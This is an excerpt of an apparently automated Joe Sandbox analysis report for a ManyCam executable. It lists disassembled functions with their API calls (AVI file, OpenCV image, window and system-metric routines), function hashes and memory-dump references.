                                                                                                                                            • Opcode Fuzzy Hash: 57f5941b643651e987862c1e0d1d6f7d17b30a8860795f25dd51119af805d3df
                                                                                                                                            • Instruction Fuzzy Hash: 8631E671609302EFC701AF44E64816ABFA4FFC1751FA18D88E4E922199D73198758F8B
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@$_setjmp3fopen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2836828308-0
                                                                                                                                            • Opcode ID: 83ad89e9acc0db619ab61287bb8d8b6e458a0f4023930257b46fb7cdadf3862e
                                                                                                                                            • Instruction ID: c0495488141cce935a3d74c3dcd7f25807248fb21dbc7bdf9e8c4d59f3c21e9b
                                                                                                                                            • Opcode Fuzzy Hash: 83ad89e9acc0db619ab61287bb8d8b6e458a0f4023930257b46fb7cdadf3862e
                                                                                                                                            • Instruction Fuzzy Hash: A421F871A41304AFD710EF698842BAEF7E8FF45700F0485EEE95897342D771AA118BE1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sprintf
                                                                                                                                            • String ID: %12.12e$sCAL
                                                                                                                                            • API String ID: 590974362-3005958862
                                                                                                                                            • Opcode ID: c1fb173f87a4ff0b3b200c6d710552d2290fe47d9c5561a200db3cf18e243b88
                                                                                                                                            • Instruction ID: b81dc8953f4a8c41eba9f7d90a0a4a8a75d7bf1f6d9106cc4090cab603e297c2
                                                                                                                                            • Opcode Fuzzy Hash: c1fb173f87a4ff0b3b200c6d710552d2290fe47d9c5561a200db3cf18e243b88
                                                                                                                                            • Instruction Fuzzy Hash: 031151765147506B9204D668CC02CFFB7ECEEC5320F140A5EF5A2632D1EBE5EA0587AA
                                                                                                                                            APIs
                                                                                                                                            • cvAlloc.CXCORE099(00000030), ref: 00B91F04
                                                                                                                                            • memset.MSVCR80 ref: 00B91F14
                                                                                                                                              • Part of subcall function 00B91230: AVIFileInit.AVIFIL32(00B91F21), ref: 00B91239
                                                                                                                                            • AVIFileOpenA.AVIFIL32(00000000,?,00001001,00000000), ref: 00B91F2E
                                                                                                                                              • Part of subcall function 00B91C60: memset.MSVCR80 ref: 00B91D14
                                                                                                                                              • Part of subcall function 00B91C60: AVIFileCreateStreamA.AVIFIL32(?,?,vids), ref: 00B91DCD
                                                                                                                                            • cvReleaseVideoWriter.HIGHGUI099(?), ref: 00B91F6F
                                                                                                                                              • Part of subcall function 00B91830: cvFree_.CXCORE099(00000000), ref: 00B91848
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$memset$AllocCreateFree_InitOpenReleaseStreamVideoWriter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 40045735-0
                                                                                                                                            • Opcode ID: 32b067c6baf9894d569aff6307ba045cc9a72d4a9612e151e579e8b997e2f2f9
                                                                                                                                            • Instruction ID: 843ec37f6b46f1c2461dfffe5d396cf8c2716da3e0d7c37e4f8ce5db59cc6ded
                                                                                                                                            • Opcode Fuzzy Hash: 32b067c6baf9894d569aff6307ba045cc9a72d4a9612e151e579e8b997e2f2f9
                                                                                                                                            • Instruction Fuzzy Hash: C411B2706053025FD620EF6C9941B6FB7E4EF84790F104DADF585C2281E730DD0597A6
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: freadfseeklongjmpmemcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2772266533-0
                                                                                                                                            • Opcode ID: 66a454410df139e916a1d3114de1c8daf3fa2f1f73607deae27b503cff068178
                                                                                                                                            • Instruction ID: c7ff533b0e36389eb8176a1c0fbb0bb87a78d5bd795f470beb7a575b3d0a8707
                                                                                                                                            • Opcode Fuzzy Hash: 66a454410df139e916a1d3114de1c8daf3fa2f1f73607deae27b503cff068178
                                                                                                                                            • Instruction Fuzzy Hash: 7D118E71B10B10AFDB38CB29DC54E6BB3F9EB88714B04492DF98683740EA75F8448B50
                                                                                                                                            APIs
                                                                                                                                            • GetTopWindow.USER32(?), ref: 0044648F
                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 004464A0
                                                                                                                                            • SendMessageW.USER32(00000000,?,?,?), ref: 004464BF
                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 004464CF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1496643700-0
                                                                                                                                            • Opcode ID: 0fc2dd0073c28b6c66ec9f54719fca97d74c0b9b452a9e8b98ab4c061e3703d5
                                                                                                                                            • Instruction ID: 5599d8aec985cfa69e8589d1268fc08193e69a2bbc754be235a44f600a99598a
                                                                                                                                            • Opcode Fuzzy Hash: 0fc2dd0073c28b6c66ec9f54719fca97d74c0b9b452a9e8b98ab4c061e3703d5
                                                                                                                                            • Instruction Fuzzy Hash: 9411FA75A00208FFDB04DFE8D944EAE77B9AB88300F10855EFA0697390D734AE05DB69
                                                                                                                                            APIs
                                                                                                                                            • cvCreateImage.CXCORE099(?,?,?,?), ref: 00B93878
                                                                                                                                            • cvReleaseImage.CXCORE099 ref: 00B93895
                                                                                                                                            • ??3@YAXPAX@Z.MSVCR80(?), ref: 00B938A1
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000004), ref: 00B938B1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Image$??2@??3@CreateRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 387725118-0
                                                                                                                                            • Opcode ID: 33c0b4b4cfef9e54a189eedcd18104dc8b2f02f8c52caf8dacbe285785c2da59
                                                                                                                                            • Instruction ID: 0be49bc542f90994ee644d86914ce1eedcc1047e0ff562eaa9140680f065b820
                                                                                                                                            • Opcode Fuzzy Hash: 33c0b4b4cfef9e54a189eedcd18104dc8b2f02f8c52caf8dacbe285785c2da59
                                                                                                                                            • Instruction Fuzzy Hash: C8017CB25047019FE720DB28D941B17B7E9EF94B10F0589BAF49A83291EB70E845C761
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCR80 ref: 00422406
                                                                                                                                              • Part of subcall function 004232A0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004232B6
                                                                                                                                            • wcslen.MSVCR80 ref: 00422427
                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000000), ref: 00422448
                                                                                                                                            • SendMessageW.USER32(?,0000100F,?,00000000), ref: 00422460
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$memsetwcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1629969563-0
                                                                                                                                            • Opcode ID: 27b4e246d41088bd54c352e73dc6f3ec4014a33d544db1ace6c82cc66d73829c
                                                                                                                                            • Instruction ID: fd28faf10420b3e9cf0d4e7cd47fee78e406ddaa3a8982db2d9a389e17546391
                                                                                                                                            • Opcode Fuzzy Hash: 27b4e246d41088bd54c352e73dc6f3ec4014a33d544db1ace6c82cc66d73829c
                                                                                                                                            • Instruction Fuzzy Hash: F901E9B1D00208EBEB14DFD0EC8ABDEBBB5BB58704F044118F601AB391DB75A9058B95
                                                                                                                                            APIs
                                                                                                                                            • AVIStreamGetFrameClose.AVIFIL32(?), ref: 00B91260
                                                                                                                                            • AVIStreamRelease.AVIFIL32(?), ref: 00B91270
                                                                                                                                            • AVIStreamRelease.AVIFIL32(?), ref: 00B91280
                                                                                                                                            • memset.MSVCR80 ref: 00B912AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Stream$Release$CloseFramememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1615332947-0
                                                                                                                                            • Opcode ID: 74f3bb1eb6318d52f922f36249a1ed8ee939f265a6e7ebd6d421ff97f4babc2f
                                                                                                                                            • Instruction ID: 762a8e4cc1b9c69aec5b08563090aa0d106c908424661a4f1329b589f4449029
                                                                                                                                            • Opcode Fuzzy Hash: 74f3bb1eb6318d52f922f36249a1ed8ee939f265a6e7ebd6d421ff97f4babc2f
                                                                                                                                            • Instruction Fuzzy Hash: 8AF017B1A00B009AC620AF2AD841E5BF7E9EFD1710F158E9FE5E9D7621E374A8408B51
                                                                                                                                            APIs
                                                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 0041E37B
                                                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041E386
                                                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 0041E391
                                                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041E3A2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4116985748-0
                                                                                                                                            • Opcode ID: 22b1d73353d5bc3e7bbfce1216fdfc9bbe2c5f0851a8470d3ca0ef857e634515
                                                                                                                                            • Instruction ID: 0309d501508c84c491e30ef2097f10fb6b95fe06418acfa07dbdd42ca1e239de
                                                                                                                                            • Opcode Fuzzy Hash: 22b1d73353d5bc3e7bbfce1216fdfc9bbe2c5f0851a8470d3ca0ef857e634515
                                                                                                                                            • Instruction Fuzzy Hash: 69018078E00209AFE704DF94E8499ACBBB1FF58300F1482AAEE5997781DB702A54DB45
                                                                                                                                            APIs
                                                                                                                                            • ?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,00488724,7EC02BB4,0049A100,7EC02BB0,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?,?), ref: 00488737
                                                                                                                                            • ?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,00488724,7EC02BB4,0049A100,7EC02BB0,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?,?,0049A100), ref: 00488742
                                                                                                                                            • ?erase@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@II@Z.MSVCP80(00000000,?,?,00488724,7EC02BB4,0049A100,7EC02BB0,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?), ref: 00488759
                                                                                                                                            • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@ABV01@@Z.MSVCP80(?,?,?,00488724,7EC02BB4,0049A100,7EC02BB0,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?), ref: 00488766
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$Myptr@?$basic_string@_$??4?$basic_string@_?erase@?$basic_string@_V01@V01@@V12@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3537912873-0
                                                                                                                                            • Opcode ID: 5056e8f042ebb5b06e388abe9d7013084b117bbf253dc20301d42485009f9af0
                                                                                                                                            • Instruction ID: 68c4d93e9c4a580dced358607109a40fa72366f08dc93a0fa3c65411e4fd161c
                                                                                                                                            • Opcode Fuzzy Hash: 5056e8f042ebb5b06e388abe9d7013084b117bbf253dc20301d42485009f9af0
                                                                                                                                            • Instruction Fuzzy Hash: 6CE01235200108AFEB14EF54EC58D99777BFB98391F008125FA0A8B362DB30AD44DB94
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _setjmp3memset
                                                                                                                                            • String ID: $
                                                                                                                                            • API String ID: 847497011-3993045852
                                                                                                                                            • Opcode ID: 1a06700a312aa925aba508b1ab4504e69a8b554c5a861c46cf7b74cb6e60b044
                                                                                                                                            • Instruction ID: d96db83a22791587ae816de3f060dcbe1302dc0391860956656d7ad2f9fc3fa6
                                                                                                                                            • Opcode Fuzzy Hash: 1a06700a312aa925aba508b1ab4504e69a8b554c5a861c46cf7b74cb6e60b044
                                                                                                                                            • Instruction Fuzzy Hash: 6691B330A046048BDF349B78C8957BEB7E5EF92344F6448BED46AC7292DF789C448B52
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _setjmp3memset
                                                                                                                                            • String ID: VUUU
                                                                                                                                            • API String ID: 847497011-2040033107
                                                                                                                                            • Opcode ID: e4441fe17ac87a9348d9567e74d779725232fa11da2fc543bcc51072b1b441e1
                                                                                                                                            • Instruction ID: 4ac568a0fc4f79bf454a0b7258f45c9fc1bcf5c7a1faa685159ed21c9cd0dc19
                                                                                                                                            • Opcode Fuzzy Hash: e4441fe17ac87a9348d9567e74d779725232fa11da2fc543bcc51072b1b441e1
                                                                                                                                            • Instruction Fuzzy Hash: 8461C571A04B048BDF24DB78E9A5BAEB7E1EF95301F1484BDE46A87242DB306844CF51
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00BCC870: GlobalAlloc.KERNEL32(00000000,00000000,00BCFB2A,00BD084E,?,?,?,00BD084E,?,?,00000000,?), ref: 00BCC877
                                                                                                                                            • _ftol.MSVCR80 ref: 00BD3DE5
                                                                                                                                            Strings
                                                                                                                                            • No space to write RATIONAL array, xrefs: 00BD3D0B
                                                                                                                                            • "%s": Information lost writing value (%g) as (unsigned) RATIONAL, xrefs: 00BD3D7E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocGlobal_ftol
                                                                                                                                            • String ID: "%s": Information lost writing value (%g) as (unsigned) RATIONAL$No space to write RATIONAL array
                                                                                                                                            • API String ID: 2648542381-1820873451
                                                                                                                                            • Opcode ID: e9ca2ca5aeb3f6fd3a82fd4fcfcbae64d1234d622eedaa8121b6d74ccbe85267
                                                                                                                                            • Instruction ID: 510cada84a4520f2c8592f5428e91826e917f43d66dfb16b07491a7dbdaa7f02
                                                                                                                                            • Opcode Fuzzy Hash: e9ca2ca5aeb3f6fd3a82fd4fcfcbae64d1234d622eedaa8121b6d74ccbe85267
